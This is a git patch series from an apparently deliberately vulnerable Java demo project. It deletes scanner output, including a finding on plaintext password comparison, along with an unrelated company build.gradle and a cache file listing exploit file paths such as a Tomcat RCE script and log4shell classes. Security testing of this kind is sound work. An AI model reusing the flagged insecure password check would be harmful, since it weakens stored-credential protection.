org.zeroturnaround:zt-zip@1.12 +Upgrade direct dependency org.zeroturnaround:zt-zip@1.12 to org.zeroturnaround:zt-zip@1.13 + +Organisation: austin.doll +Licenses enabled + +Tested 60 dependencies for known issues +io.github.snyk:todolist-web-struts - No issues found after custom filtering From cbb8697936069f3d64338698b0cae6452854069c Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Tue, 4 Mar 2025 12:06:26 -0500 Subject: [PATCH 21/38] push --- .gradle/8.8/fileHashes/fileHashes.bin | Bin 18547 -> 18547 bytes .gradle/8.8/fileHashes/fileHashes.lock | Bin 17 -> 17 bytes .../buildOutputCleanup.lock | Bin 17 -> 17 bytes .gradle/buildOutputCleanup/cache.properties | 4 +- as.json | 0 boutput.json | 507 ------------------ build.gradle | 284 ---------- 7 files changed, 2 insertions(+), 793 deletions(-) delete mode 100644 as.json delete mode 100644 boutput.json delete mode 100644 build.gradle diff --git a/.gradle/8.8/fileHashes/fileHashes.bin b/.gradle/8.8/fileHashes/fileHashes.bin index 3aa9dcacf9f29688729607b7da35724157196e72..0ee76a9e4f71653def7a520f4579a6c6830cfe2b 100644 GIT binary patch delta 27 ecmex7f${SM#tlgxf>V>^Oi_@% diff --git a/.gradle/buildOutputCleanup/buildOutputCleanup.lock b/.gradle/buildOutputCleanup/buildOutputCleanup.lock index 6b811c0daebe6dfdadeaec7b84c4bdd2727308e3..2d2c435ca065d42a440562246ed98d24770dbffd 100644 GIT binary patch literal 17 UcmZQxzE%C?_1RY+Ge7_{07A0`eE entries;\n", - "lineNumber": 22, - "lineChange": "none" - }, - { - "line": " private boolean dirty = false;\n", - "lineNumber": 23, - "lineChange": "none" - }, - { - "line": "\n", - "lineNumber": 24, - "lineChange": "none" - }, - { - "line": " StorageProviderFile(Path path) throws IOException {\n", - "lineNumber": 24, - "lineChange": "none" - }, - { - "line": " this.path = path;\n", - "lineNumber": 26, - "lineChange": "none" - }, - { - "line": " this.gson = new Gson();\n", - "lineNumber": 27, - "lineChange": "none" - }, - { - "line": "\n", - "lineNumber": 28, - "lineChange": "none" - }, - { - "line": " if (Files.exists(path)) {\n", - "lineNumber": 29, - "lineChange": "none" - }, - { - "line": " entries = new HashMap<>();\n", - "lineNumber": 30, - "lineChange": "none" - }, - { - "line": " Arrays.stream(gson.fromJson(new String(Files.readAllBytes(path), StandardCharsets.UTF_8), POJOUserEntry[].class)).forEach(e -> entries.put(e.username, e));\n", - "lineNumber": 31, - "lineChange": "none" - }, - { - "line": " } else {\n", - "lineNumber": 32, - "lineChange": "none" - }, - { - "line": " if (!Files.exists(path.getParent())) {\n", - "lineNumber": 33, - "lineChange": "none" - }, - { - "line": " Files.createDirectories(path.getParent());\n", - "lineNumber": 34, - "lineChange": "none" - }, - { - "line": " }\n", - "lineNumber": 35, - "lineChange": "none" - }, - { - "line": " entries = new HashMap<>();\n", - "lineNumber": 36, - "lineChange": "none" - }, - { - "line": " Files.createFile(path);\n", - "lineNumber": 37, - "lineChange": "none" - }, - { - "line": " }\n", - "lineNumber": 38, - "lineChange": "none" - }, - { - "line": " }\n", - "lineNumber": 39, - "lineChange": "none" - }, - { - "line": "\n", - "lineNumber": 40, - "lineChange": "none" - }, - { - "line": " @Override\n", - "lineNumber": 41, - "lineChange": "none" - }, - { - "line": " public boolean checkPassword(String username, String password) {\n", - "lineNumber": 42, - "lineChange": "none" - }, - { - "line": " if (entries.containsKey(username)) {\n", - "lineNumber": 43, - "lineChange": "none" - }, - { - "line": " return entries.get(username).password.equals(password);\n", - "lineNumber": 43, - "lineChange": "removed" - }, - { - "line": " return BCrypt.checkpw(password, entries.get(username).password);\n", - "lineNumber": 44, - "lineChange": "added" - } - ] - } - ], - "exampleCommitDescriptions": [], - "precision": "very-high", - "repoDatasetSize": 2, - "cwe": [ - "CWE-256" - ] - } -} diff --git a/build.gradle b/build.gradle deleted file mode 100644 index 9b8da9a2b8..0000000000 --- a/build.gradle +++ /dev/null @@ -1,284 +0,0 @@ -buildscript { - ext { - projectName = 'hyrax' - projectVersion = version - buildNumber = System.env.BUILD_NUMBER ?: "1" - arch = 'noarch' - awaitilityVersion = '4.1.0' - commonsCollection4Version = '4.4' - commonsIOVersion = '2.8.0' - commonsLang3Version = '3.12.0' - ehcacheVersion = '3.8.1' - geronimoSpecJavaMail = '1.8.4' - googleCloudBomVersion = '26.42.0' - gradleGitPropertiesVersion = '2.3.2' - httpBuilderVersion = '0.6' - httpClientVersion = '5.2.3' - honeycombOpentelemetryVersion = '1.5.2' - janinoVersion = '3.1.10' - javaxCacheVersion = '1.1.1' - lombokPluginVersion = '5.3.3.3' - mockitoVersion = '3.12.3' - snakeYamlVersion = '1.33' - sonarQubePluginVersion = '2.6.2' - springBootAdminVersion = '3.2.3' - springBootVersion = '3.2.5' - junitVersion = '5.10.1' - testContainerVersion = '1.19.3' - nexus = 'https://nexus.i.xmatters.com/repository/maven-public/' - nexusPublishUsername = project.hasProperty("nexusPublishUsername") ? project.getProperty("nexusPublishUsername") : "" - nexusPublishPassword = project.hasProperty("nexusPublishPassword") ? project.getProperty("nexusPublishPassword") : "" - applicationDefaultJvmArgs = [ - "-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5006" - ] - dockerOauthToken = 'gcloud -q auth print-access-token'.execute().text.trim() - } - repositories { - maven { url "${nexus}" } - mavenCentral() - mavenLocal() - maven { url "https://plugins.gradle.org/m2/" } - } -} -plugins { - id 'java' - id 'maven-publish' - id 'jacoco' - id 'checkstyle' - id 'org.springframework.boot' version "${springBootVersion}" - id 'org.sonarqube' version "${sonarQubePluginVersion}" - id 'com.gorylenko.gradle-git-properties' version "${gradleGitPropertiesVersion}" - id 'io.freefair.lombok' version "${lombokPluginVersion}" - id 'com.google.cloud.tools.jib' version '3.4.3' -} -java { - toolchain { - languageVersion = JavaLanguageVersion.of(17) - } -} -ext.githash = 'git rev-parse --short HEAD'.execute().text.trim() -ext.virtualHostVersion = version.replaceAll('(\\d+\\.\\d+\\.\\d+)(\\..*)?', '$1').replaceAll("\\.", "-") -jacoco { - toolVersion = "0.8.8" -} -repositories { - mavenLocal() - mavenCentral() - maven { url "${nexus}" } -} -checkstyle { - configFile = new File(rootDir, "/gradle/xMattersFormatAndImportChecks.xml") - toolVersion = "5.9" -} -configurations.configureEach { - resolutionStrategy.cacheChangingModulesFor 0, 'seconds' - exclude module: "spring-boot-starter-tomcat" - exclude module: "log4j" - exclude module: "log4j-api" - exclude module: "android-json" -} -dependencies { - implementation platform("org.springframework.boot:spring-boot-dependencies:${springBootVersion}") - implementation "org.springframework.boot:spring-boot-starter-web" - implementation "org.springframework.boot:spring-boot-starter-jetty" - implementation("org.springframework.boot:spring-boot-starter-webflux") - implementation("org.springframework.boot:spring-boot-starter-oauth2-client") - // tag::actuator[] - implementation "org.springframework.boot:spring-boot-starter-actuator" - // end::actuator[] - implementation "org.springframework.boot:spring-boot-starter-security" - implementation 'org.springframework.security:spring-security-oauth2-jose:6.2.1' - constraints { - implementation("org.yaml:snakeyaml:${snakeYamlVersion}") { - because "Upgraded to ${snakeYamlVersion} because of CVE-2022-25857" - } - implementation("ch.qos.logback:logback-core:1.2.13") { - because "Upgraded to 1.2.13 because of CVE-2023-6378" - } - implementation("ch.qos.logback:logback-classic:1.2.13") { - because "Upgraded to 1.2.13 because of CVE-2023-6378" - } - } - implementation("org.springframework.boot:spring-boot-starter-cache") - implementation "org.springframework.boot:spring-boot-starter-cache" - // see http://stackoverflow.com/questions/27935293/spring-ldap-example-requires-persistence for the reason for this - implementation "org.springframework:spring-tx" - implementation "org.codehaus.janino:janino" - implementation("com.xmatters:springbok:${springbokVersion}") { - exclude group: 'org.bouncycastle', module: 'bcprov-jdk15on' - } - implementation("com.xmatters:customer-config-client:4.347.0") - implementation group: "com.xmatters", name: "xm-zuulproxy", version: "${xmZuulProxyVersion}", changing: true - implementation("org.apache.httpcomponents.client5:httpclient5:${httpClientVersion}") - implementation("org.apache.commons:commons-collections4:${commonsCollection4Version}") - implementation("org.apache.commons:commons-lang3:${commonsLang3Version}") - implementation 'io.prometheus:simpleclient:0.16.0' - implementation "de.codecentric:spring-boot-admin-starter-client:${springBootAdminVersion}" - implementation "com.xmatters:spring-boot-starter-xmatters:${xmSpringBootStarterVersion}" - implementation "org.ehcache:ehcache:${ehcacheVersion}" - implementation "javax.cache:cache-api:${javaxCacheVersion}" - implementation "com.fasterxml.jackson.datatype:jackson-datatype-jsr310:2.17.1" - implementation group: 'commons-io', name: 'commons-io', version: "${commonsIOVersion}" - implementation 'redis.clients:jedis:5.1.2' - implementation "io.honeycomb:honeycomb-opentelemetry-sdk:${honeycombOpentelemetryVersion}" - // Websocket/STOMP - implementation "org.springframework.boot:spring-boot-starter-websocket" - implementation 'org.springframework:spring-messaging' - // Consul client library, may be used for service registration and Key/Value API - implementation('com.ecwid.consul:consul-api:1.4.2') { - exclude group: 'com.google.code.gson', module: 'gson' - } - implementation 'javax.xml.bind:jaxb-api:2.3.1' - implementation 'org.glassfish.jaxb:jaxb-runtime:2.3.1' - // SMTP for email bounce back - implementation "org.apache.geronimo.javamail:geronimo-javamail_1.4_mail:${geronimoSpecJavaMail}" - implementation 'com.sun.activation:javax.activation:1.2.0' - // https://cloud.google.com/java/docs/bom - implementation platform("com.google.cloud:libraries-bom:${googleCloudBomVersion}") - implementation 'com.google.code.gson:gson' - implementation 'com.google.guava:guava' - implementation 'com.google.cloud:google-cloud-pubsub' - implementation 'com.google.cloud:google-cloud-storage' - implementation 'com.google.cloud:google-cloud-tasks' - testImplementation "org.junit.vintage:junit-vintage-engine" - testImplementation "org.springframework.boot:spring-boot-starter-test" - testImplementation "org.mockito:mockito-inline:${mockitoVersion}" - testImplementation "org.awaitility:awaitility:${awaitilityVersion}" - testImplementation "com.github.codemonstur:embedded-redis:1.0.0" - // Needed for the HyraxAuthApiTestController and its associated configuration. - testImplementation('org.springframework.security:spring-security-oauth2-authorization-server:1.2.1') - testImplementation(platform('org.junit:junit-bom:5.10.2')) - testImplementation('org.junit.jupiter:junit-jupiter') - testRuntimeOnly('org.junit.platform:junit-platform-launcher') - testImplementation( - "com.redis:testcontainers-redis:2.0.1", - "org.junit.jupiter:junit-jupiter-api", - "org.junit.jupiter:junit-jupiter-params", - "org.mockito:mockito-junit-jupiter:${mockitoVersion}", - "org.springframework.boot:spring-boot-starter-test", - "org.testcontainers:junit-jupiter:${testContainerVersion}", - "org.testcontainers:testcontainers:${testContainerVersion}", - ) -} -sonarqube { - properties { - property "sonar.projectVersion", version.split('-')[0] - property "sonar.language", "java" - property "sonar.scm.disabled", "true" - property "sonar.core.coveragePlugin", "Jacoco" - } -} -test { - // Checkstyle after test run - finalizedBy = [jacocoTestReport, check] - systemProperties = ["spring.profiles.active": "test, test-overrides"] - useJUnitPlatform() - testLogging { - exceptionFormat = 'full' - events "passed", "skipped", "failed", "standardOut", "standardError" - } -} -tasks.withType(JavaCompile).configureEach { - options.compilerArgs << '-Xlint:all,-cast,-deprecation,-processing,-rawtypes,-serial,-static,-unchecked' << '-Werror' -} -bootRun { - gradle.taskGraph.whenReady { taskGraph -> - if (taskGraph.hasTask(bootRun)) { - def error = ''' -Standalone DEV is no longer supported. Please use dev in the cloud for local development. -To discourage further use of this function, you will be presented with a bad dad joke each time you run it! - -''' - try { - def response = 'curl https://icanhazdadjoke.com/'.execute().text - error += '*' * response.length() - error += '\n' + response + '\n' - error += '*' * response.length() - } catch (e) { - error += 'Error 404 Dad Joke Not Found Searching Dad-A-Base' - } - throw new GradleException(error) - } - } -} -// We want to use the branch name as part of the GCR tag. However we don't want the raw branch name, -// so we strip out symbols and non alpha-numerics. We also strip out git branch text that contains -// remotes/origin or origin/, since we don't care about that. -def sanitize = { input -> - return input.replaceAll("[^A-Za-z0-9.]", "_").toLowerCase().replaceAll("remotes_origin_", "").replaceAll("origin_", ""); -} -def buildNumber = System.env.BUILD_NUMBER ?: "1" -def gcpGitbranch = 'git name-rev --name-only HEAD'.execute().text.trim() -def githash = 'git rev-parse --short HEAD'.execute().text.trim() -def gitbranchTag = sanitize(gcpGitbranch) -def dockerTagShort = "${project.version}-${buildNumber}-${gitbranchTag}-${githash}" -def dockerRepo = "us-central1-docker.pkg.dev/xmatters-eng-mgmt/apps/hyrax" -def dockerTag = "${dockerRepo}:${dockerTagShort}" -def buildType = System.env.BUILD_NUMBER ? "JENKINS" : "LOCAL" -//Create gcpBuildVersion.properties file containing build information. This is for the build environment to pass onto -// other upstream callers that are unable to figure out this information on their own. -tasks.register('versionProp') { - onlyIf { true } - doLast { - new File("$project.buildDir/gcpBuildVersion.properties").text = """ -APPLICATION="hyrax" -VERSION=${project.version} -BUILD=${buildNumber} -BRANCH=${gcpGitbranch} -GIT_HASH=${githash} -TAG_FULL=${dockerTag} -TAG=${dockerTagShort} -TIMESTAMP=${new Date().format('yyyy-MM-dd HH:mm:ss')} -BUILD_TYPE=${buildType} -""" - } -} -generateGitProperties.finalizedBy versionProp -jib { - from { - image = "us-central1-docker.pkg.dev/xmatters-eng-mgmt/base-containers/ibm-semeru-runtimes:xm-open-17.0.10_7-jre-jammy" - } - to { - image = "us-central1-docker.pkg.dev/xmatters-eng-mgmt/apps/hyrax" - tags = ['latest', dockerTagShort] - } - container { - entrypoint = ["/entrypoint.sh"] - mainClass = "com.xmatters.cloudagent.Application" - ports = ['8083'] - containerizingMode = 'exploded' - environment = [ - SERVICE : "hyrax", - OTEL_JAVAAGENT_LOGGING: "application", - OTEL_JAVAAGENT_DEBUG : "false", - OTEL_METRICS_EXPORTER : "none", - JVM_MEMORY : "-XX:MaxRAMPercentage=50", - JVM_PARAMS : "-XshowSettings:vm -Xshareclasses:cacheDir=/opt/xmatters/jvmclassescache/hyrax,name=xmatters.hyrax,nonfatal -Xscmx300M", - JVM_SSL : "-Djavax.net.ssl.sessionCacheSize=10000 -Dhttps.protocols=TLSv1.2 -Djdk.tls.client.protocols=TLSv1.2", - JVM_GC : "-Xverbosegclog:/var/log/xmatters/hyrax/gc--%pid--%Y-%m-%d_%H-%M-%S.log,5,100000", - HEAP_DUMP : "-XX:+HeapDumpOnOutOfMemoryError -XX:HeapDumpPath=/var/log/xmatters/hyrax/heap.dump -Xdump:heap:events=user", - THREAD_DUMP_OUTPUT : "-XX:+UnlockDiagnosticVMOptions -XX:+LogVMOutput -XX:LogFile=/var/log/xmatters/hyrax/thread.out", - LOG_HOME : "/var/log/xmatters/hyrax", - INFO_DEPENDENCIES_XMAPI_VERSION : "${xmApiCompatibility}".toString() - ] - labels = [ - maintainer: "mustafar@xmatters.com", - app : "hyrax", - owner : "Mustafar", - version : "${version}", - role : "api" - ] - extraDirectories { - paths { - path { - from = file('docker/files') - into = '/' - includes = ['entrypoint.sh'] - } - } - permissions = [ - '/entrypoint.sh': '755' - ] - } - } -} From dabf651c01a40e63618c241325d26b1d290a8f37 Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Tue, 4 Mar 2025 12:07:32 -0500 Subject: [PATCH 22/38] push --- .dccache | 1 - index.html | 1 - output.json | 65575 -------------------------------------------- output.txt | 15 - output2.json | 12 - snyk.html | 828 - test-command.json | 1421 - test.json | 511 - test2.json | 108 - 9 files changed, 68472 deletions(-) delete mode 100644 .dccache delete mode 100644 index.html delete mode 100644 output.json delete mode 100644 output.txt delete mode 100644 output2.json delete mode 100644 snyk.html delete mode 100644 test-command.json delete mode 100644 test.json delete mode 100644 test2.json diff --git a/.dccache b/.dccache deleted file mode 100644 index 2dfbd1e49a..0000000000 --- a/.dccache +++ /dev/null @@ -1 +0,0 @@ -{"/Users/austindoll/Documents/GitHub/java-goof/.snyk":[263,1709233923336.8115,"4d5ddb18a63b61551137b8f6c2a53c131b013c740e9811f6aa33f3915dd4cbd6"],"/Users/austindoll/Documents/GitHub/java-goof/index.html":[664,1709234730093.0112,"b4b1fd34388ac1f26eb24ebcaff6dbb1a68bf5fe408c038644f2f675380b9f3d"],"/Users/austindoll/Documents/GitHub/java-goof/pom.xml":[847,1707749068003.2305,"da6ee224cb97110767ecdfd388ff49d09c79cabb83148cbc3c2d00247a99d5a9"],"/Users/austindoll/Documents/GitHub/java-goof/snyk.html":[46685,1708959251167.5747,"430bcf566f778c2cdfa1c3f36a8b0e14e6e65c43caacf812db410839fe091ff4"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/pom.xml":[813,1707749068003.1423,"e3ab9c5fd3179257a8c7aabd94eaea5eaa5da23a5a61a7395e06ec0d4d29093c"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/pom.xml":[3789,1707749068011.1064,"ca348a55eee0c2c6b76fd19daa5001a2ae8a74f7584132d07f7fcc5b9d81a1cd"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/web.xml":[163602,1707749068031.4702,"14fbfdf6f89135f18a36425670fc0549a5919415639b72448f1301858000e7c1"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-client/pom.xml":[1522,1707749068001.598,"849085e013ad19cc95f39178fa254c7e98c69c7539550bfc12ed4dfe163a25de"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/pom.xml":[2629,1707749068002.589,"69176bc5c5aed490d7cdeb4c3a6bf06f25d8e3609b2824d7cd7da97741f697ba"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/pom.xml":[3597,1707749068017.0205,"09fed335bb1308ee3b405e6eb7cee510fc64e96527c59e933912d047ee60dc0d"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/pom.xml":[2430,1707749068020.6174,"71757d958b575723f0010daa01d6e579df879a16c7160f779c0f92102af5b894"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/pom.xml":[3468,1707749068023.351,"61ef52abd4ad31c5cbdf91d0ed533c96dd7fb2d6bebdabf4a625a4fd6fc80c55"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/exploits/tomcat-rce/exploit.py":[6127,1707749068006.9976,"1044e4d9d2f0035f2a1ceb0d9cb6f2b290917ee311d7e605352b4d982547bb98"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/about.html":[4688,1707749068013.4434,"e0396d1712516cf3a477e7143c8be27c608da18c6929d07d4dfae0043ecf5f51"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/account.html":[10141,1707749068013.62,"7bfc9a8f3e554519afa0483021bda4f0e1340444e41579d03cf42b9e73a445ec"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/createTodo.html":[5494,1707749068013.7979,"7fb7501b2dfc287ea26b53e44154eb91f1256a347d9d578ca6a34b100e6b4299"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/home.html":[16033,1707749068013.969,"20d27904c27c8a764dbdf142006895805d3d27b4b428e63cdcea81450b561031"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/index.html":[2636,1707749068014.067,"104bbef8fe73eb729f086317f1c7b16e4ead3eecb1aa7431728c9bba4a59e02e"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/login-error.html":[3404,1707749068014.147,"92e9656c27429357777f74cb85c7446168962ea38ff4cc906c02696694e0f30b"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/login.html":[3201,1707749068014.241,"a547c1172ac5214ec936a5bcfc2f7ae8375eca78e19a86c58add1d0a37262a3f"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/register.html":[4215,1707749068014.373,"1eb6f41a808801f5881fc573e7110e6ad682ca17d8126609025e73e67a69b2a8"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/searchTodo.html":[11497,1707749068014.504,"0dd8ffc0a703279252eff55566765326701d297c34bc4d721912b6c6224d81a5"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/updateTodo.html":[6468,1707749068016.7961,"aeea0bd71e519e04d3aa60cfe27868803f07bb19f4c9212fb90d1bf0ff6af714"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-client/src/main/java/Main.java":[1581,1707749068001.87,"771ba599971e26873da00309f2e5f2d764fcc0edbe2d1c345841891aa3588a26"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/src/main/java/Evil.java":[496,1707749068002.8047,"51919d812e029ba3072f606a02420fc15bf479506dfe8075a7042adca8923993"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/src/main/java/Server.java":[7682,1707749068002.9707,"190e04c4ba5e3750e4fb8ff2f87c06b88a9b2cd7403ddb9458c9d4d3072d0aff"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/src/main/java/Vandalize.java":[632,1707749068003.0623,"691d442e5a144bc4cc10204ebbf253abfa45ec13699d87b806c503b435850dc5"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/resources/struts.xml":[8029,1707749068025.5425,"34c773e0dfa168a8d9947cf3e0fd13282fde503cadd3dd959b72c2cae8afe72e"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/static/js/bootstrap-datepicker.js":[11683,1707749068016.2554,"b03662f2b02be2cb7bcc3c387ef24a950414103b056d8d6c6ff461b8f4d7b01c"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/static/js/bootstrap.min.js":[28631,1707749068016.3838,"a515a82292b34bdde3447113634d5d496039ffd4d6a0c7382586f3c24e582645"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/static/js/jquery-1.10.2.min.js":[93107,1707749068016.646,"0ba081f546084bd5097aa8a73c75931d5aa1fc4d6e846e53c21f98e6a1509988"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/resources/META-INF/persistence.xml":[766,1707749068019.1663,"5fd1eca212d0b30f490d98338bf56550394060c0c4342a1bcf6ad6643b787428"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/web.xml":[1316,1707749068028.074,"e3525f343fa0a2fe1f3dfea1bcddb69649d71eae9bda52ae2b118113f6cb574a"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/resources/META-INF/spring/application-context.xml":[868,1707749068019.3025,"b60c87281e4808b5d0f12a314c51d7cd44dd0a057a2378f925deb2e7b13f3d5e"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/resources/META-INF/spring/infrastructure-context.xml":[2335,1707749068019.3816,"c9a996e921025ae765b092e5739a03af219548a902852670444144d09d58f194"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/about.jsp":[1868,1707749068025.8013,"eedab2c226de89d4d4d85f9ed044d628cf6070e616ad29e9f03f83752656a691"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/error.jsp":[653,1707749068026.3748,"6106cdf7b628fa2aac9a04a3d268be6f60f3d5dc1ab9a1d336f54bbbd74f6174"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/index.jsp":[1861,1707749068026.4595,"01dc1dd68bb95ee1f99ef396b6fcb8a098c5f911d581a4885a8be4fc87ebd91a"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/static/js/bootstrap-datepicker.js":[11683,1707749068030.258,"b03662f2b02be2cb7bcc3c387ef24a950414103b056d8d6c6ff461b8f4d7b01c"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/static/js/bootstrap.min.js":[28631,1707749068030.3862,"a515a82292b34bdde3447113634d5d496039ffd4d6a0c7382586f3c24e582645"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/static/js/jquery-1.10.2.min.js":[93107,1707749068031.0234,"0ba081f546084bd5097aa8a73c75931d5aa1fc4d6e846e53c21f98e6a1509988"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/create.jsp":[2544,1707749068026.6067,"b2b33b8980b011d4968751de2f7a9850115f7ab9a56bb49e7dea24fc3c973e23"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/search.jsp":[4454,1707749068026.7534,"1cb05693027f12118e9512a3e01a3f921b84f59e00a77ce94c059acf9db13dc2"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/update.jsp":[3605,1707749068027.0662,"c449f35943ee90d512149c3d1b26347c3750c1859fc8c537b4f0d10606ba4700"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/upload.jsp":[1466,1707749068027.223,"0597d3a625750805184ddeccbe1f494128c4964ff6239e547159c624b7e59e0a"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/account.jsp":[7316,1707749068027.4456,"3a06613691bab220ee216c8e5774adbedd84ced7e595109291293c3ad28ed49c"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/files.jsp":[1585,1707749068027.5571,"461382d325567c4c669cef5176148d9e14be127fc4793652542612e372eb5432"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/home.jsp":[4828,1707749068027.7083,"b0cd89cd2c9d5a9dacb4e285ff924078315d9c937d6ea1a3605a538bbe05b0eb"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/login.jsp":[2108,1707749068027.8154,"fef8f3f5c975a6a4912b5708b8b5cd3409b6d749569f7eca1d7b9f7793f8766a"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/register.jsp":[3249,1707749068027.9233,"5495c3acf8521dc6e68b66fb1e68ce835316d11cebf02d73e2407b23dd5f1dc9"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/test/java/io/github/todolist/core/TodoServiceTest.java":[2061,1707749068020.2898,"97a4d9a387a2b063bed68c376282b7844fd77e1a1ab6bfa9f566fb6c66815ab3"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/test/java/io/github/todolist/core/UserServiceTest.java":[1911,1707749068020.393,"f08674cb5b00b45c4f2c0f5478b62a8d6da2e610ebf928d95d0f162ccf6b25f1"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/Statics.java":[302,1707749068017.4575,"faf8ae30c8c00074f924d68192efea8ddf173d772e3857987eebc8474af8a025"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/domain/Priority.java":[1400,1707749068017.6262,"fbcf56cefa0166697104dc80f3cd9454e0a9ed64f32bf1f51b8ff52c61ade443"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/domain/Todo.java":[5142,1707749068017.7947,"e511ab0dcf0d6d60e2a08912558a03d2f3c2b4246cb374fc899c7375707a8ba6"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/domain/User.java":[2744,1707749068017.8948,"82a4b1757798282d230b769625371b91f2a8892ad313f088159147548a511ce1"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/api/TodoRepository.java":[2606,1707749068018.112,"a4b3b4808634f298057a0a480b55a279d4387af97bf285ecaf674dfea43184e1"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/api/UserRepository.java":[2317,1707749068018.204,"dd3a1c73160008585fac38906516ee38a4c1ef58b1d8dca35b3c62a160318178"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/impl/TodoRepositoryImpl.java":[3171,1707749068018.3552,"80a2b851d940654643a460c2caae7ae6c2388353e7f9f50ae7c00df84cff1b57"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/impl/UserRepositoryImpl.java":[3163,1707749068018.4534,"78b6b47b4356741a6f46104bade197655e9dd6064821d8bce20fd555f97880b5"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/api/TodoService.java":[2585,1707749068018.6626,"2633068fbc59901a47a3a3bc9ae24be71a1f89f5bcbab9b88a69fdce4aa77b14"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/api/UserService.java":[2298,1707749068018.7725,"3dca704e01dcd28b8745421c21b4dc83f89020f5a0806f166bfee124f476a1b8"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/impl/TodoServiceImpl.java":[2798,1707749068018.8906,"ff7c4f6a14b51f6918b875849eba94d08cd041ea4262a5ba232f4c4724e3a117"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/impl/UserServiceImpl.java":[2591,1707749068018.9702,"d44ca42f